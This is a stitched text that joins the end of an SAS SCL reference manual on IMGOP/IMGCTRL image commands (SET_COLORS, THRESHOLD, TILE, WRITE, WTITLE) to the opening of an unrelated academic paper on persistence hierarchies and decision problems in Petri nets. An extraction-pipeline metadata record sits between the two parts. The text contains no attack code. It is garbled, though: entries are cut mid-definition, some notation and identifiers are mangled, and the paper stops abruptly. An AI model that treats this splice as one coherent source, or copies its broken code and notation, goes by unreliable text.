The main purpose of the SELECT command is to enable you to work with more than one image. The command specifies the image identifier to be used in all subsequent commands until another SELECT command is issued.
Only the COPY, DESTROY, and UNPASTE commands can act on either the currently selected image or on a specified image identifier.
Example
Display two images at once:
```c
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,path1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ_PASTE',200,200,path2);
```
---
**SET_COLORS**
Assigns the RGB values for the index positions of a color map for the current image
**Syntax**
```c
rc=IMGOP(task-id,'SET_COLORS',index,red,green,blue);
```
- **index**
- contains the identifier for the color map index.
- Type: Numeric
- **red**
- is the red value for the index.
- Type: Numeric
- **green**
- is the green value for the index.
- Type: Numeric
- **blue**
- is the blue value for the index.
- Type: Numeric
**Details**
SET_COLORS acts on the currently selected image. It can be used with either a new image or an existing image. If index is outside the valid range for the color map an error is returned. The color values must be between 0 and 255.
**Example**
See the example for “CREATE_IMAGE” on page 743.
---
**SET_PIXEL**
Assigns the pixel value in an image at the specified position
Syntax
rc=IMGOP(task-id,'SET_PIXEL',x,y,red,<green, blue>);
x
is the row location in the image.
Type: Numeric
y
is the column location in the image.
Type: Numeric
red
is either the red value of an RGB image or the pixel value for a CMAP or GRAY image.
Type: Numeric
green
is the green value for an RGB image and is ignored for all others.
Type: Numeric
blue
is the blue value for an RGB image and is ignored for all others.
Type: Numeric
Details
SET_PIXEL acts on the currently selected image. It can be used with either a new image or an existing image. An error is returned if any of the values are out of bounds. The colors for a CMAP and an RGB image must be between 0 and 255. For a GRAY image, SET_PIXEL returns either 0 or 1 for red.
CAUTION:
Image data can be destroyed. Use this function carefully, or you can destroy your image data. SET_PIXEL overwrites the image data in memory and thus destroys the original image.
Example
See the example for “CREATE_IMAGE” on page 743.
STANDARD_CMAP
Selects a color map
Syntax
```plaintext
rc=IMGOP(task-id,'STANDARD_CMAP',color-map);
```
color-map
is the color map to designate as the current color map.
**BEST**
is a special, dynamic color map that can contain up to 129 colors. The color map contains the 16 personal computer colors, a set of grays, and an even distribution of colors. The colors are dynamically selected based on the capabilities of the display and on the number of available colors. The best set of colors is chosen accordingly.
**COLORMIX_CGA**
is the 16-color personal computer color map.
**COLORMIX_192**
is a 192-color blend.
**DEFAULT**
is an initial set of colors that is chosen by default. The available colors may vary between releases.
**SYSTEM**
is the color map for the currently installed device or system. The color map obtained is a “snapshot” of the color map for the current device and does not change as the device’s color map changes.
*Type: Character*
Details
**STANDARD_CMAP** specifies that the current color map should be filled with one of the “standard” image color maps. This new color map can be applied to any image by using either the DITHER command or the MAP_COLORS command.
**Example**
Select a new color map and use the DITHER command to apply it to an image:
```plaintext
rc=imgop(task-id,'STANDARD_CMAP','COLORMIX_CGA');
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'DITHER');
```
**THRESHOLD**
Converts color images to black and white using a *threshold* value
Syntax
rc=IMGOP(task-id,THRESHOLD’,value);
value
is a threshold value for converting standard RGB values to monochrome. Value can be:
1...255 sets the threshold that determines whether a color maps to black or white
0 defaults to 128
-1 calculates the threshold value by averaging all pixels in the image.
Type: Numeric
Details
The THRESHOLD command acts on the specified or currently selected image. It enables documents that are scanned in color to be converted to monochrome for applying optical character recognition (OCR) and for other purposes. Dithering is not a good technique for converting images when OCR is used.
The threshold is a color value that acts as a cut-off point for converting colors to black and white. All colors greater than the value map to white and all colors less than or equal to the value map to black.
The algorithm weights the RGB values using standard intensity calculations for converting color to gray scale.
TILE
Replicates the current image into a new image
Syntax
rc=IMGOP(task-id,’TILE’,new-width,new-height);
new-width
is the width (in pixels) for the tiled images to fill.
Type: Numeric
new-height
is the height (in pixels) for the tiled images to fill.
Type: Numeric
Details
TILE acts on the currently selected image. The size, in pixels, of the area for the new tiled image is specified by the two parameters new-width and new-height. The area defined by new-width x new-height is filled beginning in the upper left corner. The current image is placed there. Copies of the current image are added to the right until the row is filled. This process then starts over on the next row until the area defined by new-width x new-height is filled. For example, if the current image is 40 x 40 and new-width x new-height is 200 x 140, then the current image is replicated 5 times in width and 3.5 times in height. This technique is useful for creating tiled backdrops.
Note: Before tiling an image, you must turn off the SCALE option for the image.
Example
Create a 480 x 480 tiled image from a 48 x 48 image:
rc=imgop(task-id,'READ','sashelp.c0c0c.access',
'format=cat');
rc=imgop(task-id,'TILE',480,480);
UNPASTE
Removes an image from the display
Syntax
rc=IMGOP(task-id,'UNPASTE'<,image-id>);
image-id
contains the identifier of the image to remove from the display.
Type: Numeric
Details
UNPASTE acts on the specified or currently selected image. It removes from the display the currently selected image or the image whose identifier is specified. The image is not removed from memory. UNPASTE enables you to remove an image from the display and to later repaste it without re-reading it.
Example
Display two images at once and then remove one of them:
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,name1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ_PASTE',200,200,name2);
...more SCL statements...
if (omit=1) then
rc=imgop(task-id,'UNPASTE',1);
attributes
lists attributes that are specific to the file type. See “Attributes for Reading and Writing Files” on page 782.
Type: Character
Details
WRITE writes the currently selected image to an external file. The file can be specified either directly (using its physical filename path) or by using the information that was returned by a previous LNAMEMK function call. The LNAMEMK function creates a character variable that contains location information about the location of the image (even if it is to reside in a SAS catalog), as well as information about other image attributes.
The FORMAT= attribute must be specified if image-path does not include that information.
Examples
- Write an image to a SAS catalog:
```
path=lnamemk
(5,'mine.images.sign','FORMAT=CAT');
rc=imgop(task-id,'WRITE',path);
```
- Specify a file in the WRITE command. (Notice that file attributes are included.)
```
rc=imgop(task-id,'WRITE','/user/images/sign.tif',
'FORMAT=TIFF COMPRESS=G3FAX');
```
WRITE_CLIPBOARD
Writes an image to the host clipboard
Syntax
```
rc=IMGOP(task-id,'WRITE_CLIPBOARD');
```
Details
WRITE_CLIPBOARD acts on the currently selected image. The image must be pasted before it can be written to the system clipboard.
Example
Read in an image and write it to the clipboard:
```
rc=imgop
(task-id,'READ',path);
rc=imgop(task-id,'WRITE_CLIPBOARD');
```
WSIZE
Sets the size of the Image window
Syntax
\[ \text{rc} = \text{IMGCTRL}(\text{task-id}, \text{WSIZE}, \text{width}, \text{height} <, \text{xposition}, \text{yposition}>); \]
**width**
is the width of the window (in pixels).
Type: Numeric
**height**
is the height of the window (in pixels).
Type: Numeric
**xposition**
is the X coordinate of the top left corner.
Type: Numeric
**yposition**
is the Y coordinate of the top left corner.
Type: Numeric
Details
WSIZE sets the size of the Image window. Optionally, it positions the window at xposition and yposition. Some window managers may not support positioning.
Example
Make the Image window match the size of the image that is being displayed:
```python
main:
height=0;
width=0;
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','WIDTH',iwidth);
rc=imgop(task-id,'QUERYN','HEIGHT',iheight);
rc=imgctrl(task-id,'WSIZE',iwidth,iheight);
rc=imgop(task-id,'PASTE',1,1);
return;
```
WTITLE
Specifies a title for the Image window
Syntax
```latex
rc=IMGCTRL(task-id,'WTITLE','title');
```
**title**
is the text to display as the window title.
Type: Character
Details
The specified title appears in parentheses after SAS: IMAGE in the title bar of the window.
Example
```latex
path=l namemk(5,catname,'format=cat');
rc=lnameget(path,type,name,form);
gname=scan(name,3,'.');
rc=imgctrl(tid,'wtitle',gname);
```
|
{"Source-Url": "http://www.okstate.edu/sas/v7/saspdf/sclref/a01.pdf", "len_cl100k_base": 12918, "olmocr-version": "0.1.50", "pdf-total-pages": 40, "total-fallback-pages": 0, "total-input-tokens": 76174, "total-output-tokens": 15621, "length": "2e13", "weborganizer": {"__label__adult": 0.0004260540008544922, "__label__art_design": 0.0066375732421875, "__label__crime_law": 0.00033926963806152344, "__label__education_jobs": 0.0013570785522460938, "__label__entertainment": 0.0003902912139892578, "__label__fashion_beauty": 0.00022983551025390625, "__label__finance_business": 0.0005097389221191406, "__label__food_dining": 0.00035071372985839844, "__label__games": 0.0014276504516601562, "__label__hardware": 0.004688262939453125, "__label__health": 0.00033664703369140625, "__label__history": 0.0005974769592285156, "__label__home_hobbies": 0.0002601146697998047, "__label__industrial": 0.0009407997131347656, "__label__literature": 0.0005636215209960938, "__label__politics": 0.00034499168395996094, "__label__religion": 0.0007338523864746094, "__label__science_tech": 0.08758544921875, "__label__social_life": 9.21487808227539e-05, "__label__software": 0.19140625, "__label__software_dev": 0.7001953125, "__label__sports_fitness": 0.00021445751190185547, "__label__transportation": 0.00030922889709472656, "__label__travel": 0.0002646446228027344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47558, 0.01357]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47558, 0.8801]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47558, 0.69966]], "google_gemma-3-12b-it_contains_pii": [[0, 653, false], [653, 1822, null], [1822, 2620, null], [2620, 4048, null], [4048, 5002, null], [5002, 5771, null], [5771, 7047, null], [7047, 8639, null], [8639, 9936, null], [9936, 11609, null], [11609, 13096, null], [13096, 14372, null], [14372, 15827, null], [15827, 16666, null], [16666, 17459, null], [17459, 19510, null], [19510, 20553, null], [20553, 22129, null], [22129, 23397, null], [23397, 25056, null], [25056, 26494, null], [26494, 27422, null], [27422, 28706, null], [28706, 30534, null], [30534, 32136, null], [32136, 33327, null], [33327, 34252, null], [34252, 35664, null], [35664, 36710, null], [36710, 38241, null], [38241, 39296, null], [39296, 40323, null], [40323, 41795, null], [41795, 43025, null], [43025, 44675, null], [44675, 44753, null], [44753, 46154, null], [46154, 47172, null], [47172, 47558, null], [47558, 47558, null]], "google_gemma-3-12b-it_is_public_document": [[0, 653, true], [653, 1822, null], [1822, 2620, null], [2620, 4048, null], [4048, 5002, null], [5002, 5771, null], [5771, 7047, null], [7047, 8639, null], [8639, 9936, null], [9936, 11609, null], [11609, 13096, null], [13096, 14372, null], [14372, 15827, null], [15827, 16666, null], [16666, 17459, null], [17459, 19510, null], [19510, 20553, null], [20553, 22129, null], [22129, 23397, null], [23397, 25056, null], [25056, 26494, null], [26494, 27422, null], [27422, 28706, null], [28706, 30534, null], [30534, 32136, null], [32136, 33327, null], [33327, 34252, null], [34252, 35664, null], [35664, 36710, null], [36710, 38241, null], [38241, 39296, null], [39296, 40323, null], [40323, 41795, null], [41795, 43025, null], [43025, 44675, null], [44675, 44753, null], [44753, 46154, null], [46154, 47172, null], [47172, 47558, null], [47558, 47558, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47558, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47558, null]], "pdf_page_numbers": [[0, 653, 1], [653, 1822, 2], [1822, 2620, 3], [2620, 4048, 4], [4048, 5002, 5], [5002, 5771, 6], [5771, 7047, 7], [7047, 8639, 8], [8639, 9936, 9], [9936, 11609, 10], [11609, 13096, 11], [13096, 14372, 12], [14372, 15827, 13], [15827, 16666, 14], [16666, 17459, 15], [17459, 19510, 16], [19510, 20553, 17], [20553, 22129, 18], [22129, 23397, 19], [23397, 25056, 20], [25056, 26494, 21], [26494, 27422, 22], [27422, 28706, 23], [28706, 30534, 24], [30534, 32136, 25], [32136, 33327, 26], [33327, 34252, 27], [34252, 35664, 28], [35664, 36710, 29], [36710, 38241, 30], [38241, 39296, 31], [39296, 40323, 32], [40323, 41795, 33], [41795, 43025, 34], [43025, 44675, 35], [44675, 44753, 36], [44753, 46154, 37], [46154, 47172, 38], [47172, 47558, 39], [47558, 47558, 40]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47558, 0.00894]]}
|
olmocr_science_pdfs
|
2024-12-02
|
2024-12-02
|
f77fd92fdf3b8f892152bc5b27f6cc6f6b7a0858
|
Abstract. The notion of persistence, based on the rule "no action can disable another one" is one of the classical notions in concurrency theory. It is also one of the issues discussed in the Petri net theory. We recall two ways of generalization of this notion: the first is "no action can kill another one" (called l/l-persistence) and the second "no action can kill another enabled one" (called the delayed persistence, or shortly e/l-persistence). Afterwards we introduce a more precise notion, called e/l-k-persistence, in which one action disables another one for no longer than a specified number k of single sequential steps. Then we consider an infinite hierarchy of such e/l-k persistencies. We prove that if an action is disabled, and not killed, by another one, it can not be postponed indefinitely. Afterwards, we investigate the set of markings in which two actions are enabled simultaneously, and also the set of reachable markings with that feature. We show that the minimum of the latter is finite and effectively computable. Finally we deal with decision problems about e/l-k persistencies. We show that all the kinds of e/l-k persistencies are decidable with respect to steps, markings and nets.
Keywords: Petri nets, concurrency, persistence, decision problems
1 Introduction
Petri nets constitute a very useful and suitable tool for concurrent systems modeling. Thanks to them, we can not only model real systems, but also analyze their properties and design systems which fulfill given criteria. For many years, concurrent systems have been examined in the context of their compliance with certain desirable properties, which fits in with the trend of the so-called ethics of concurrent computations. One of the commonly found undesirable properties of
concurrent systems is the presence of conflicts, and thus, one of the most desirable properties of them is conflict-freeness. The notion of persistence, proposed by Karp/Miller [11] is one of the most important notions in concurrency theory. It is based on the behaviourally oriented rule "no action can disable another one", and generalizes the structurally defined notion of conflict-freeness.
The notion of persistence is one of the issues frequently discussed in the Petri net theory - [4,10,11,14,15,13] and many others. It is being studied not only in terms of theoretical properties, and also as a useful tool for designing and analyzing software environments [3]. In engineering, persistence is a highly desirable property, especially in a case of designing systems to be implemented in hardware. Many systems cannot work properly without satisfying this property.
We say that an action of a processing system is persistent if, whenever it becomes enabled, it remains enabled until executed. A system is said to be persistent if all its actions are persistent. This classical notion has been introduced by Karp/Miller [11]. In section 2.6, we show two generalizations of the classical notion (defined in [2]): l/l-persistence and e/l-persistence which form the following hierarchy: \[ P_e/e \subseteq P_l/l \subseteq P_e/l. \] An action is said to be l/l-persistent if it remains live until executed, and is e/l-persistent if, whenever it is enabled, it cannot be killed by another action. For uniformity, we name the traditional persistence notion e/e-persistence. Next, we recall that those kinds of persistence are decidable in place-transition nets.
In section 3.1, we extend the hierarchy mentioned above with an infinite hierarchy of e/l-persistent steps. A step \( MaM' \) is said to be e/l-k-persistent for some \( k \in \mathbb{N} \) if the execution of an action \( a \) pushes the execution of any other enabled action away for at most \( k \) steps (more precise: if the execution of an action \( a \) stops the enabledness of any other action, then the enabledness is restored not later than after \( k \) steps).
In section 3.2 we study decision problems related to the notion of e/l-k-persistence. These problems include EL-k Step Persistence Problem and EL-k Marking Persistence Problem. We show that both problems are decidable (Theorem 3 and Theorem 4).
The next problem we want to focus on is EL-k Net Persistence Problem. In order to check the decidability of the problem we need to take advantage of additional tools and facts. That is why we investigate the set of markings in which two actions are enabled simultaneously, and also the set of reachable markings with that feature. We show that the minimum of the latter is finite and effectively computable. We also prove that if some action pushes the enabledness of another one away for more than \( k \) steps, then it also needs to happen in some minimal reachable marking enabling these two actions. In our proofs we use the decidability of the Set Reachability Problem (from [2]) and also we make
use of the theory of residual sets of Valk/Jantzen [18]. Finally, we show that e/l-k-persistence is decidable with respect to nets (Theorem 9).
We also prove (section 3.3) that if an action of an arbitrary p/t-net is disabled (but not killed) by another one, it can not be postponed indefinitely. We show that if a p/t-net is e/l-persistent, then it is e/l-k-persistent for some \( k \in \mathbb{N} \) (Theorem 10), and such a number \( k \) can be effectively found (Theorem 12). We also point, that the above-cited result does not hold for nets which do not have the monotonicity property (i.e. it is not true that the action enabled in some marking \( M \) is also enabled in any marking \( M' \) greater than \( M \)), for example for inhibitor nets.
The concluding section contains some questions and plans for further investigations.
A preliminary version of the paper was presented on the International Workshop on Petri Nets and Software Engineering (Hamburg, Germany, June 25-26, 2012) with electronical proceedings available online at CEUR-WS.org as Volume 851. The present paper is an improved and extended version of it.
2 Basic Notions
2.1 Denotations
The set of non-negative integers is denoted by \( \mathbb{N} \). Given a set \( X \), the cardinality (number of elements) of \( X \) is denoted by \( |X| \), the powerset (set of all subsets) by \( 2^X \), the cardinality of the powerset is \( 2^{|X|} \). Multisets over \( X \) are members of \( \mathbb{N}^X \), i.e. functions from \( X \) into \( \mathbb{N} \).
2.2 Petri Nets and Their Computations
The definitions concerning Petri nets are mostly based on [9].
Definition 1 (Nets). Net is a triple \( N = (P, T, F) \), where:
- \( P \) and \( T \) are finite disjoint sets, of places and transitions, respectively;
- \( F \subseteq P \times T \cup T \times P \) is a relation, called the flow relation.
For all \( a \in T \) we denote:
- \( a^* = \{ p \in P \mid (p, a) \in F \} \) - the set of entries to \( a \)
- \( a^\bullet = \{ p \in P \mid (a, p) \in F \} \) - the set of exits from \( a \).
Petri nets admit a natural graphical representation. Nodes represent places and transitions, arcs represent the flow relation. Places are indicated by circles, and transitions by boxes.
The set of all finite strings of transitions is denoted by $T^*$, the length of $w \in T^*$ is denoted by $|w|$, number of occurrences of a transition $a$ in a string $w$ is denoted by $|w|_a$, two strings $u, v \in T^*$ such that $(\forall a \in T) |u|_a = |v|_a$ are said to be Parikh equivalent, which is denoted by $u \equiv v$.
**Definition 2 (Place/Transition Nets).** Place/transition net (shortly, p/t-net) is a quadruple $S = (P, T, F, M_0)$, where:
- $N = (P, T, F)$ is a net, as defined above;
- $M_0 \in \mathbb{N}^P$ is a multiset of places, named the initial marking; it is marked by tokens inside the circles, capacity of places is unlimited.
Multisets of places are named markings. In the context of p/t-nets, they are mostly represented by nonnegative integer vectors of dimension $|P|$, assuming that $P$ is strictly ordered. The natural generalizations, for vectors, of arithmetic operations $+$ and $-$, as well as the partial order $\leq$, all defined componentwise, are well known and their formal definitions are omitted here.
In this context, by $\bullet a(a^*)$ we understand a vector of dimension $|P|$ which has 1 in every coordinate corresponding to a place that is an entry to (an exit from, respectively) $a$ and 0 in other coordinates.
A transition $a \in T$ is enabled in a marking $M$ whenever $\bullet a \leq M$ (all its entries are marked). If $a$ is enabled in $M$, then it can be executed, but the execution is not forced. The execution of a transition $a$ changes the current marking $M$ to the new marking $M' = (M - \bullet a) + a^*$ (tokens are removed from entries, then put to exits). The execution of an action $a$ in a marking $M$ we call a (sequential) step. We shall denote $Ma$ for the predicate "$a$ is enabled in $M$" and $MaM'$ for the predicate "$a$ is enabled in $M$ and $M'$ is the resulting marking".
This notions and predicates we extend, in a natural way, to strings of transitions: $MvM$ for any marking $M$, and $MvaM''$ ($v \in T^*, a \in T$) iff $MvM'$ and $M'aM''$.
**Remark:** Wherever this will not lead to confusion, we will use a notation $M' = Ma$ to denote the fact that the action $a$ is enabled in a marking $M$ and a marking $M'$ is the result of the execution of action $a$ in a marking $M$.
If $MwM'$, for some $w \in T^*$, then $M'$ is said to be reachable from $M$; the set of all markings reachable from $M$ is denoted by $[M]$ . Given a p/t-net $S = (P, T, F, M_0)$, the set $[M_0]$ of markings reachable from the initial marking $M_0$ is called the reachability set of $S$, and markings in $[M_0]$ are said to be reachable in $S$.
A transition $a \in T$ is said to be live in a marking $M$ if there is a string $u \in T^*$ such that $ua$ is enabled in $M$. A transition $a \in T$ that is not live in a marking $M$ is said to be dead in a marking $M$. Let $M \in [M_0]$ be a marking such that $MaM'$ for some $a \in T$, then if a transition $b \neq a$ is enabled (live) in $M$ and not enabled (not live) in $M'$, we say that (the execution of) $a$ disables (kills) $b$ in a marking $M$. We also say that an action $a$ disables (kills) $b$ (in a net $S$) if $a$ disables (kills) $b$ in some reachable marking $M$.
**Definition 3 (Inhibitor nets).** Inhibitor net is a quintuple $S = (P, T, F, I, M_0)$, where:
- $(P, T, F, M_0)$ is a p/t-net, as defined above;
- $I \subseteq P \times T$ is the set of inhibitor arcs (depicted by edges ended with a small empty circle). Sets of entries and exits are denoted by $a^\bullet$ and $a^\bullet$, as in p/t-nets; the set of inhibitor entries to $a$ is denoted by $\circ a = \{p \in P \mid (p, a) \in I\}$.
A transition $a \in T$ (of an inhibitor net) is enabled in a marking $M$ whenever $\bullet a \leq M$ (all its entries are marked) and $(\forall p \in \circ a) M(p) = 0$ - all inhibitor entries to $a$ are empty. The execution of $a$ leads to the resulting marking $M' = (M - \bullet a) + a^\bullet$.
The following well-known fact follows easily from Definitions 1 and 2.
**Fact 1 (Diamond and big diamond properties)** Any place/transition net possesses the following property:
- Big Diamond Property:
- If $MuM' \land vM'' \land u \approx v$ (Parikh equivalence), then $M' = M''$.
- Its special case with $|u| = |v| = 2$ is called the Diamond Property:
- If $MaM' \land MbaM''$, then $M' = M''$.
**Definition 4.** We say that a Petri net $S = (P, T, F, M_0)$ has the monotonicity property if and only if $(\forall w \in T^*)(\forall M, M' \in N_P) Mw \land M \leq M' \Rightarrow M'w$.
**Fact 2** P/t-nets have the monotonicity property.
*Proof.* Obvious, since in p/t-nets the tokens of $M' - M$ can be regarded as frozen (disactive) tokens.
**Fact 3** Inhibitor nets do not have the monotonicity property.
*Proof.* Let us look at the example of Fig. 1. It can be easily seen that $M_1 < M'_1$. $M_1a$ holds but $M'_1a$ doesn’t hold.
2.3 Monoid \( \mathbb{N}^k \)
**Definition 5 (Monoid \( \mathbb{N}^k \), rational operations, rational subsets).**
The monoid \( \mathbb{N}^k \) is the set of \( k \)-dimensional non-negative integer vectors with the componentwise addition \( + \).
If \( X, Y \subseteq \mathbb{N}^k \) then \( X + Y = \{ x + y \mid x \in X, y \in Y \} \) and the star operation is defined as \( X^* = \bigcup\{ X_i \mid i \in \mathbb{N} \} \), where \( X_0 = (0, \ldots, 0) \) and \( X_{i+1} = X_i + X \). The partial order \( \leq \) is understood componentwise, and \(<\) means \( \leq \) and \( \neq \). Rational subsets of \( \mathbb{N}^k \) are subsets built from finite subsets with finitely many operations of union \( \cup \), addition \( + \) and star \( * \).
**Theorem 1 (Ginsburg/Spanier[8]).** Rational subsets of \( \mathbb{N}^k \) form an effective boolean algebra (i.e. are closed under union, intersection and difference).
**Definition 6 (\( \omega \)-extension).** Let \( \mathbb{N}_\omega = \mathbb{N} \cup \{ \omega \} \), where \( \omega \) is a new symbol (denoting infinity). We extend, in a natural way, arithmetic operations: \( \omega + n = \omega, \omega - n = \omega, \) and the order: \( (\forall n \in \mathbb{N})\ n < \omega \).
The set of \( k \)-dimensional vectors over \( \mathbb{N}_\omega \) we shall denote by \( \mathbb{N}_\omega^k \), and its elements we shall call \( \omega \)-vectors. Operations \( +, - \) and the order \( \leq \) in \( \mathbb{N}_\omega^k \) are componentwise.
For \( X \subseteq \mathbb{N}_\omega^k \), we denote by \( \text{Min}(X) \) the set of all minimal (wrt \( \leq \)) members of \( X \), and by \( \text{Max}(X) \) the set of all maximal (wrt \( \leq \)) members of \( X \). Let \( v, v' \in \mathbb{N}_\omega^k \) be \( \omega \)-vectors such that \( v \leq v' \), then we say that \( v' \) covers \( v \) \( (v \text{ is covered by } v') \).
Let us recall the well known important fact known as the Dickson’s Lemma.
**Lemma 1 ([8]).** Any subset of incomparable elements of \( \mathbb{N}_\omega^k \) is finite.
**Definition 7 (Closures, convex sets).**
- Let \( x \in \mathbb{N}_\omega^k \) and \( X \subseteq \mathbb{N}_\omega^k \). We denote: \( \downarrow x = \{ z \in \mathbb{N}_\omega^k \mid z \leq x \} \), \( \uparrow x = \{ z \in \mathbb{N}_\omega^k \mid z \geq x \} \), \( \downarrow X = \bigcup\{ \downarrow x \mid x \in X \} \), \( \uparrow X = \bigcup\{ \uparrow x \mid x \in X \} \), and call the sets \( \downarrow \) and \( \uparrow \) closures of \( X \), respectively;
- A set \( X \subseteq \mathbb{N}_\omega^k \) such that \( X = \downarrow X = \uparrow X \) is said to be left-(right-) closed;
- A set \( X \subseteq \mathbb{N}_\omega^k \) such that \( X = \downarrow X = \uparrow X \) is said to be convex.
We also recall a fact proved in [2]:
**Proposition 1.** Any convex subset of \( \mathbb{N}^k \) is rational.
2.4 Reachability graph/tree and coverability graph
Let us recall the notions of a reachability graph/tree and a coverability graph. Their definitions can be also found in any monograph or survey about Petri nets (see [5,17] or arbitrary else). Reachability graphs/trees are used for studying complete behaviors of nets, but they are usually infinite, which makes an accurate analysis of them difficult. That is why we study coverability graphs, which represent the behaviors of nets only partially, but are always finite.
The reachability graph of a p/t-net $S = (P, T, F, M_0)$ is a couple $RG = (G, M_0)$ where $[M_0] \times P \times [M_0] \supseteq G = \{(M, a, M') | M \in [M_0] \land MaM'\}$.
The reachability graph $RG$ represents graphically the behavior of the net $S$. Vertices of the graph are reachable markings from the set $[M_0]$, while edges are ordered pairs of reachable states, labeled by actions. More precisely: the edge $(M, a, M') \in G$ if $M$ is a state reachable from the initial marking $M_0$, an action $a \in T$ (the label of the edge $(M, a, M')$) is enabled in a state $M$ and $M' = Ma$.
The existence of an edge $(M, a, M')$ in the reachability graph of the net $S$ indicates that the marking $M$ is reachable in $S$, the action $a$ is enabled in $M$ and after the execution of the action $a$ in the marking $M$, the net $S$ reaches the state $M'$.
Sometimes it is more convenient to use a special graph structure for listing all reachable markings of a given p/t-net, namely a tree structure. Such a tree is called a reachability tree.
For a given net $S = (P,T,F,M_0)$ we construct its reachability tree $RT$ proceeding as follows:
- We start with the initial marking $M_0$ which is the root vertex of the reachability tree.
- For each action $a$ enabled in the initial marking of the net, we create a new vertex $M'$, such that $M' = M_0a$, and an edge $(M_0, a, M')$ leading from $M_0$ to $M$ labelled by $a$.
- We repeat the procedure for all the newly created vertices (markings).
Remark: The construction of a reachability tree is a process potentially endless, as the structure is infinite in many cases.
Definition 8. Let $RT$ be a reachability tree of a net $S = (P,T,F,M_0)$. The k-component of the reachability tree $RT$ is the initial part of the tree of the depth $k$ (all vertices at depth lower than or equal to $k$).
In the case of a coverability tree it is convenient to present a constructional definition. That is why we introduce:
Algorithm of the construction of a coverability graph
We create a coverability graph for a p/t-net \( S = (P, T, F, M_0) \)
- **Step 0. An initial vertex**
We set \( M_0 \) blue for a start.
GOTO Step 1.
- **Step 1. Generating of new working vertices**
If there is no blue vertices then STOP.
We take an arbitrary blue vertex \( M \) and draw from it all the arcs of the form \( (M, t, M') \) for all \( t \in T \) enabled in \( M \), where \( M' = Mt \). If the vertex \( M' \) already exists (in any colour), then the newly created arc leads to the existing vertex (we do not create a new one). New vertices are set yellow. After drawing all such arcs we set the vertex \( M \) grey (a final node).
GOTO Step 2.
- **Step 2. Coverability checking**
If there is no yellow vertices GOTO Step 1.
We take an arbitrary yellow vertex \( M \) and check for any of the paths from \( M_0 \) to \( M \) whether a vertex \( M' \) such that \( M' \leq M \) lies on the path. If such a vertex exists then every coordinate of the marking \( M \) greater than the corresponding coordinate of the marking \( M' \) changes to \( \omega \). Finally we set the vertex \( M \) blue.
GOTO Step 2.
*Example 1.* Let us look at the Example of Figure 2. A p/t-net and stages of the construction of its coverability graph are presented there.
*Remark:* A coverability graph is always finite. The proof is based on two facts: the Dickson’s Lemma (Lemma 1) and the monotonicity property (Fact 2).
### 2.5 Reachability and Coverability Problems
Let us now recall very famous decision problems concerning Petri nets, namely the Reachability Problem and the Coverability Problem.
**Reachability Problem**
*Instance:* P/t-net \( S = (N, M_0) \), and a marking \( M \).
*Question:* Is \( M \) reachable in \( S \)?
**Coverability Problem**
*Instance:* P/t-net \( S = (N, M_0) \), and a marking \( M \).
Question: Is $M$ coverable in $S$?
Remark: It is well known that the above problems are decidable (coverability: Karp/Miller [11], Hack [10]; reachability: Mayr [15], Kosaraju [12]).
2.6 Three Kinds of Persistence
The notion of persistence is one of the classical notions in concurrency theory. The notion is recalled in [2] (named in the sequel e/e-persistence). Some of its generalizations: l/l-persistence and e/l-persistence are also introduced there.
Note on terminology
The notion of persistence in its classical meaning is a property of nets. The definition of [14] involves the entire concurrent system. If we choose to define the concept of persistence starting from actions by markings, ending with whole nets, the classic definition can be interpreted in two ways. Namely, one can consider concepts of persistence and nonviolence. An extensive discussion on the links between persistence and nonviolence can be found in [13]. In the context of [11] and [13] it seems that it would be more appropriate to use the notion of nonviolence instead of using the concept of persistence. However, because our paper is an extension of [2], we decided to stick to the concept of persistence.
Let us sketch the notions of e/e-persistence, l/l-persistence and e/l-persistence informally. The classical e/e-persistence means "no action can disable another one", the l/l-persistence means "no action can kill another one" and the e/l-persistence means "no action can kill another enabled one". Let us go on to formal definitions.
**Definition 9 (Three kinds of persistence).** Let \( S = (P, T, F, M_0) \) be a place/transition net. If \((\forall M \in [M_0]) (\forall a, b \in T) \)
- \( Ma \land Mb \land a \neq b \Rightarrow Mab \), then \( S \) is said to be e/e-persistent;
- \( Ma \land (\exists u)Mub \land a \neq b \Rightarrow (\exists v)Mavb \), then \( S \) is said to be l/l-persistent;
- \( Ma \land Mb \land a \neq b \Rightarrow (\exists v)Mavb \), then \( S \) is said to be e/l-persistent.
The classes of e/e-persistent (l/l-persistent, e/l-persistent) p/t-nets will be denoted by \( P_{e/e}, P_{l/l} \) and \( P_{e/l} \), respectively.
In [2] one can find a proof of the following theorem:
**Theorem 2.** The three classes of persistent place/transition nets form an increasing hierarchy:
\[ P_{e/e} \subseteq P_{l/l} \subseteq P_{e/l} \].

**Example 2.** To see the strictness of the above inclusion, let us look at the Examples of Figure 4 and 5 (derived from [2]).
It is also shown in [2] that the following decision problems are decidable:
**Instance:** A p/t-net \((N, M_0)\)
**Questions:**
